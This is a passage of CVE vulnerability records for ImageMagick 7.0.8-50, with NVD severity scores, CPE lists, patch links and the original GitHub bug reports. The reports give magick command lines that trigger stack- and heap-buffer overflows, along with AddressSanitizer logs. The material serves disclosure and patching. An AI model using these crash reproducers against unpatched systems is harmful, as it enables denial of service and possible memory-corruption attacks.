#5 0x7f71ac885f6d in ProcessCommandOptions MagickWand/magick-cli.c:529:3
#6 0x7f71ac886d0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#7 0x7f71ac8d0ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#8 0x526f95 in MagickMain utilities/magick.c:149:10
#9 0x5268e1 in main utilities/magick.c:180:10
#10 0x7f71a7347b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#11 0x41b069 in _start (install/bin/magick+0x41b069)
Address 0x7ffcc293daa0 is located in stack of thread T0 at offset 14752 in frame
#0 0x7f71ad7e1daf in WritePNMImage coders/pnm.c:1522
This frame has 6 object(s):
[32, 4128) 'buffer' (line 1523)
[4256, 8352) 'magick' (line 1523)
[8480, 12576) 'type117' (line 1675)
[12704, 14752) 'pixels' (line 1736) <== Memory access at offset 14752 overflows this variable
[14880, 16928) 'pixels255' (line 1788)
[17056, 19104) 'pixels381' (line 1857)
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow coders/pnm.c:1762:21 in WritePNMImage
```
### System Configuration
<!-- Tell us about the environment where you are experiencing the bug -->
- ImageMagick version:
Version: ImageMagick 7.0.8-50 Q16 x86_64 2019-06-21 https://imagemagick.org
- Environment (Operating system, version and so on):
Description: Ubuntu 18.04.1 LTS
Release: 18.04
Codename: bionic
- Additional information:
CC=clang-7 CXX=clang++-7 ./configure --disable-openmp
<!-- Thanks for reporting the issue to ImageMagick! -->
| stack-buffer-overflow at coders/pnm.c:1762 in WritePNMImage | https://api.github.com/repos/ImageMagick/ImageMagick/issues/1614/comments | 4 | 2019-06-21T06:36:50Z | 2019-08-10T11:27:40Z | https://github.com/ImageMagick/ImageMagick/issues/1614 | 459,035,202 | 1,614 |
CVE-2019-13305 | 2019-07-05T01:15:10.563 | ImageMagick 7.0.8-50 Q16 has a stack-based buffer overflow at coders/pnm.c in WritePNMImage because of a misplaced strncpy and an off-by-one error. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html"
},
{
"source": "[email protected]",
"tags": [
"Patch"
],
"url": "https://github.com/ImageMagick/ImageMagick/commit/29efd648f38b73a64d73f14cd2019d869a585888"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/1613"
},
{
"source": "[email protected]",
"tags": [
"Patch"
],
"url": "https://github.com/ImageMagick/ImageMagick6/commit/5c7fbf9a14fb83c9685ad69d48899f490a37609d"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2019/08/msg00021.html"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://usn.ubuntu.com/4192-1/"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2020/dsa-4712"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2020/dsa-4715"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*",
"matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
"matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*",
"matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
"matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*",
"matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*",
"matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*",
"matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ImageMagick/ImageMagick/issues/1613 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [x] I have written a descriptive issue title
- [x] I have verified that I am using the latest version of ImageMagick
- [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported
### Description
<!-- A description of the bug or feature -->
There's a stack-buffer-overflow at coders/pnm.c:1906 in WritePNMImage.
### Steps to Reproduce
<!-- List of steps, sample code, failing test or link to a project that reproduces the behavior.
Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues -->
run_cmd:
`magick -seed 0 -undercolor rgb"("67,255,32")" -compress None "(" magick:rose -solarize 1% ")" "(" magick:logo +repage ")" -size 2338x1505+3581 -print "" tmp`
Here's ASAN log.
```
=================================================================
==25473==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe4120cba0 at pc 0x7f1d07f024d8 bp 0x7ffe412080f0 sp 0x7ffe412080e8
WRITE of size 1 at 0x7ffe4120cba0 thread T0
#0 0x7f1d07f024d7 in WritePNMImage coders/pnm.c:1906:21
#1 0x7f1d0779a065 in WriteImage MagickCore/constitute.c:1159:16
#2 0x7f1d0779af8c in WriteImages MagickCore/constitute.c:1376:13
#3 0x7f1d0715e50d in CLINoImageOperator MagickWand/operation.c:4796:14
#4 0x7f1d071621cc in CLIOption MagickWand/operation.c:5258:7
#5 0x7f1d06fa3f6d in ProcessCommandOptions MagickWand/magick-cli.c:529:3
#6 0x7f1d06fa4d0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#7 0x7f1d06feeba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#8 0x526f95 in MagickMain utilities/magick.c:149:10
#9 0x5268e1 in main utilities/magick.c:180:10
#10 0x7f1d01a65b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#11 0x41b069 in _start (install/bin/magick+0x41b069)
Address 0x7ffe4120cba0 is located in stack of thread T0 at offset 19104 in frame
#0 0x7f1d07effdaf in WritePNMImage coders/pnm.c:1522
This frame has 6 object(s):
[32, 4128) 'buffer' (line 1523)
[4256, 8352) 'magick' (line 1523)
[8480, 12576) 'type117' (line 1675)
[12704, 14752) 'pixels' (line 1736)
[14880, 16928) 'pixels255' (line 1788)
[17056, 19104) 'pixels381' (line 1857) <== Memory access at offset 19104 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow coders/pnm.c:1906:21 in WritePNMImage
```
### System Configuration
<!-- Tell us about the environment where you are experiencing the bug -->
- ImageMagick version:
Version: ImageMagick 7.0.8-50 Q16 x86_64 2019-06-21 https://imagemagick.org
- Environment (Operating system, version and so on):
Description: Ubuntu 18.04.1 LTS
Release: 18.04
Codename: bionic
- Additional information:
CC=clang-7 CXX=clang++-7 ./configure --disable-openmp
<!-- Thanks for reporting the issue to ImageMagick! -->
| stack-buffer-overflow at coders/pnm.c:1906 in WritePNMImage | https://api.github.com/repos/ImageMagick/ImageMagick/issues/1613/comments | 2 | 2019-06-21T06:23:44Z | 2019-07-08T01:52:06Z | https://github.com/ImageMagick/ImageMagick/issues/1613 | 459,030,453 | 1,613 |
CVE-2019-13306 | 2019-07-05T01:15:10.623 | ImageMagick 7.0.8-50 Q16 has a stack-based buffer overflow at coders/pnm.c in WritePNMImage because of off-by-one errors. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html"
},
{
"source": "[email protected]",
"tags": [
"Patch"
],
"url": "https://github.com/ImageMagick/ImageMagick/commit/e92040ea6ee2a844ebfd2344174076795a4787bd"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/1612"
},
{
"source": "[email protected]",
"tags": [
"Patch"
],
"url": "https://github.com/ImageMagick/ImageMagick6/commit/cb5ec7d98195aa74d5ed299b38eff2a68122f3fa"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2019/08/msg00021.html"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://usn.ubuntu.com/4192-1/"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2020/dsa-4715"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*",
"matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
"matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*",
"matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
"matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*",
"matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*",
"matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*",
"matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ImageMagick/ImageMagick/issues/1612 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [x] I have written a descriptive issue title
- [x] I have verified that I am using the latest version of ImageMagick
- [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported
### Description
<!-- A description of the bug or feature -->
There's a stack-buffer-overflow at coders/pnm.c:1902 in WritePNMImage.
I think this is related with [#1540](https://github.com/ImageMagick/ImageMagick/issues/1540), but it was heap and this issue is about the stack buffer overflow.
### Steps to Reproduce
<!-- List of steps, sample code, failing test or link to a project that reproduces the behavior.
Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues -->
run_cmd:
`magick -seed 0 -dispose Previous -compress None "(" magick:rose +repage ")" "(" magick:logo -level 64,0%,0.874 ")" -loop 5 tmp`
Here's ASAN log.
```
==12131==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc7100b060 at pc 0x0000004477c4 bp 0x7ffc710065b0 sp 0x7ffc71005d60
WRITE of size 10 at 0x7ffc7100b060 thread T0
#0 0x4477c3 in strncpy (install/bin/magick+0x4477c3)
#1 0x7f1cca22b433 in WritePNMImage coders/pnm.c:1902:20
#2 0x7f1cc9ac3065 in WriteImage MagickCore/constitute.c:1159:16
#3 0x7f1cc9ac3f8c in WriteImages MagickCore/constitute.c:1376:13
#4 0x7f1cc948750d in CLINoImageOperator MagickWand/operation.c:4796:14
#5 0x7f1cc948b1cc in CLIOption MagickWand/operation.c:5258:7
#6 0x7f1cc92ccf6d in ProcessCommandOptions MagickWand/magick-cli.c:529:3
#7 0x7f1cc92cdd0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#8 0x7f1cc9317ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#9 0x526f95 in MagickMain utilities/magick.c:149:10
#10 0x5268e1 in main utilities/magick.c:180:10
#11 0x7f1cc3d8eb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#12 0x41b069 in _start (install/bin/magick+0x41b069)
Address 0x7ffc7100b060 is located in stack of thread T0 at offset 19104 in frame
#0 0x7f1cca228daf in WritePNMImage coders/pnm.c:1522
This frame has 6 object(s):
[32, 4128) 'buffer' (line 1523)
[4256, 8352) 'magick' (line 1523)
[8480, 12576) 'type117' (line 1675)
[12704, 14752) 'pixels' (line 1736)
[14880, 16928) 'pixels255' (line 1788)
[17056, 19104) 'pixels381' (line 1857) <== Memory access at offset 19104 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow (install/bin/magick+0x4477c3) in strncpy
```
### System Configuration
<!-- Tell us about the environment where you are experiencing the bug -->
- ImageMagick version:
Version: ImageMagick 7.0.8-50 Q16 x86_64 2019-06-21 https://imagemagick.org
- Environment (Operating system, version and so on):
Description: Ubuntu 18.04.1 LTS
Release: 18.04
Codename: bionic
- Additional information:
CC=clang-7 CXX=clang++-7 ./configure --disable-openmp
<!-- Thanks for reporting the issue to ImageMagick! -->
| stack-buffer-overflow at coders/pnm.c:1902 in WritePNMImage | https://api.github.com/repos/ImageMagick/ImageMagick/issues/1612/comments | 2 | 2019-06-21T06:13:39Z | 2019-07-08T01:52:26Z | https://github.com/ImageMagick/ImageMagick/issues/1612 | 459,027,438 | 1,612 |
CVE-2019-13307 | 2019-07-05T01:15:10.687 | ImageMagick 7.0.8-50 Q16 has a heap-based buffer overflow at MagickCore/statistic.c in EvaluateImages because of mishandling rows. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html"
},
{
"source": "[email protected]",
"tags": [
"Patch"
],
"url": "https://github.com/ImageMagick/ImageMagick/commit/025e77fcb2f45b21689931ba3bf74eac153afa48"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/1615"
},
{
"source": "[email protected]",
"tags": [
"Patch"
],
"url": "https://github.com/ImageMagick/ImageMagick6/commit/91e58d967a92250439ede038ccfb0913a81e59fe"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://usn.ubuntu.com/4192-1/"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2020/dsa-4712"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2020/dsa-4715"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*",
"matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
"matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*",
"matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
"matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*",
"matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*",
"matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*",
"matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ImageMagick/ImageMagick/issues/1615 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [x] I have written a descriptive issue title
- [x] I have verified that I am using the latest version of ImageMagick
- [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported
### Description
<!-- A description of the bug or feature -->
There's a heap-buffer-overflow at MagickCore/statistic.c:559:43 in EvaluateImages.
### Steps to Reproduce
<!-- List of steps, sample code, failing test or link to a project that reproduces the behavior.
Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues -->
run_cmd:
`magick -seed 0 -monitor -bias 63 "(" magick:rose -colorize 172,35,77 ")" "(" magick:logo +repage ")" -crop 507x10'!'+20-54 -evaluate-sequence Median tmp`
Here's ASAN log.
```
=================================================================
==10817==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x611000000c80 at pc 0x7f0648490e06 bp 0x7ffce3c96900 sp 0x7ffce3c968f8
WRITE of size 8 at 0x611000000c80 thread T0
#0 0x7f0648490e05 in EvaluateImages MagickCore/statistic.c:559:43
#1 0x7f0647aa55bf in CLIListOperatorImages MagickWand/operation.c:4084:22
#2 0x7f0647aaf35e in CLIOption MagickWand/operation.c:5279:14
#3 0x7f06478f0a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#4 0x7f06478f1d0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#5 0x7f064793bba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#6 0x526f95 in MagickMain utilities/magick.c:149:10
#7 0x5268e1 in main utilities/magick.c:180:10
#8 0x7f06423b2b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#9 0x41b069 in _start (install/bin/magick+0x41b069)
0x611000000c80 is located 0 bytes to the right of 256-byte region [0x611000000b80,0x611000000c80)
allocated by thread T0 here:
#0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397)
#1 0x7f064832b0b6 in AcquireMagickMemory MagickCore/memory.c:478:10
#2 0x7f064832b11f in AcquireQuantumMemory MagickCore/memory.c:551:10
#3 0x7f06484926e7 in AcquirePixelThreadSet MagickCore/statistic.c:182:33
#4 0x7f0648490b21 in EvaluateImages MagickCore/statistic.c:499:19
#5 0x7f0647aa55bf in CLIListOperatorImages MagickWand/operation.c:4084:22
#6 0x7f0647aaf35e in CLIOption MagickWand/operation.c:5279:14
#7 0x7f06478f0a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#8 0x7f06478f1d0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#9 0x7f064793bba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#10 0x526f95 in MagickMain utilities/magick.c:149:10
#11 0x5268e1 in main utilities/magick.c:180:10
#12 0x7f06423b2b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
SUMMARY: AddressSanitizer: heap-buffer-overflow MagickCore/statistic.c:559:43 in EvaluateImages
```
### System Configuration
<!-- Tell us about the environment where you are experiencing the bug -->
- ImageMagick version:
Version: ImageMagick 7.0.8-50 Q16 x86_64 2019-06-22 https://imagemagick.org
- Environment (Operating system, version and so on):
Description: Ubuntu 18.04.1 LTS
Release: 18.04
Codename: bionic
- Additional information:
CC=clang-7 CXX=clang++-7 ./configure --disable-openmp
<!-- Thanks for reporting the issue to ImageMagick! -->
